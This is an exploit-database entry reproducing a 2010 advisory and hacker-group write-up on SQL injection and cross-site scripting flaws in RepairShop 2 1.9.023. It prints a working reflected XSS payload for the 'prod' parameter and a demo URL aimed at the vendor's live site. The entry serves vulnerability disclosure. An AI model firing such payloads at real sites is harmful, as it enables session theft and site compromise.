header-logo
Suggest Exploit
vendor:
RepairShop 2
by:
kaMtiEz
7.5
CVSS
HIGH
SQL Injection and Cross-site Scripting
CWE
Product Name: RepairShop 2
Affected Version From: 1.9.023 Trial
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

RepairShop 2 SQL Injection and Cross-site Scripting Vulnerabilities

The SQL-injection vulnerability and the cross-site scripting vulnerability in RepairShop 2 allows an attacker to steal authentication credentials, control the site's rendering, compromise the application, access or modify data, or exploit other vulnerabilities in the database.

Mitigation:

No fix available
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38907/info

RepairShop 2 is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

RepairShop 2 1.9.023 Trial is vulnerable; other versions may also be affected.

#############################################################################################################
## RepairShop2 - cross site scripting ( XSS )	                                                           ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 20 March, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.realitymedias.com/
[+] Download : http://www.realitymedias.com/repairshop/?L=downloads
[+] version : 1.9.023
[+] Vulnerability : XSS
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER]

[ EXPLOIT ]

"><script>alert(666)</script>

[ DEMO ]

http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod="><script>alert(666)</script>

[ FIX ]

:(


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31


[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] to someone .. satu langkah lagi .. :D
[+] CS-31 : kutunggu di kotaku :">

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..